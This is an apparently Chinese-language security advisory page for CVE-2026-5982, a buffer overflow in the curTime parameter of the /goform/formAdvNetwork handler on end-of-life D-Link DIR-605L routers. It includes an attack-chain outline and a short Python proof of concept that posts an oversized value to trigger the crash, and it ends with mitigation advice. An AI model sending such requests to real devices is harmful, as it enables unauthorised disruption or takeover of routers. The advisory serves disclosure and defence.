IPBUF安全漏洞报告
English
CVE-2026-5982 CVSS 8.8 高危

CVE-2026-5982 D-Link DIR-605L 缓冲区溢出漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-5982
漏洞类型
缓冲区溢出
CVSS评分
8.8 高危
攻击向量
网络 (AV:N)
认证要求
低权限 (PR:L)
用户交互
无需交互 (UI:N)
影响产品
D-Link DIR-605L

相关标签

缓冲区溢出D-LinkDIR-605LRCEIoTEOL

漏洞概述

D-Link DIR-605L 路由器固件版本 2.13B01 中存在一个高危缓冲区溢出漏洞。该漏洞源于组件 /goform/formAdvNetwork 的 POST 请求处理函数 formAdvNetwork 对传入参数 curTime 缺乏严格的边界检查。攻击者可通过发送特制的恶意数据包触发该漏洞,导致缓冲区溢出。由于该设备已停止厂商支持,用户面临极高的远程代码执行风险。

技术细节

该漏洞位于 D-Link DIR-605L 路由器的 Web 管理接口处理逻辑中。具体来说,当向 /goform/formAdvNetwork 端点发送 POST 请求时,后端的 formAdvNetwork 函数负责处理用户输入。问题出在对 curTime 参数的解析过程中,程序未正确验证该参数的长度,直接将其拷贝至栈上固定大小的缓冲区。攻击者利用此缺陷,可以精心构造超长的 curTime 数据覆盖返回地址或其他关键数据。鉴于 CVSS 向量显示需要低权限(PR:L),攻击者可能需要登录或具备某种低级别访问权限,但一旦利用成功,即可在设备上执行任意代码,完全控制系统,并导致机密性泄露、完整性丧失及服务不可用。

攻击链分析

STEP 1
侦察
攻击者扫描网络,识别运行固件版本为 2.13B01 的 D-Link DIR-605L 路由器。
STEP 2
获取访问权限
由于 CVSS 显示需要低权限(PR:L),攻击者尝试通过弱口令或默认凭证登录 Web 管理界面。
STEP 3
漏洞利用
攻击者向 /goform/formAdvNetwork 接口发送包含恶意构造的 curTime 参数的 POST 请求。
STEP 4
代码执行
触发缓冲区溢出,覆盖返回地址,导致设备崩溃或执行攻击者注入的任意代码。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL (example) target_url = "http://192.168.0.1/goform/formAdvNetwork" # Malicious payload to trigger buffer overflow # Padding to exceed the buffer size payload = "A" * 500 data = { "curTime": payload } try: # Sending POST request response = requests.post(target_url, data=data, timeout=5) print(f"Status Code: {response.status_code}") print("Exploit sent.") except Exception as e: print(f"Error: {e}")

影响范围

D-Link DIR-605L 2.13B01

防御指南

临时缓解措施
由于厂商已停止对该产品的支持,无法获得官方补丁。建议用户立即更换新型号路由器。若必须继续使用,请务必关闭路由器的远程管理功能(WAN访问),并仅通过局域网进行管理,同时修改默认管理员密码以增加攻击难度。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表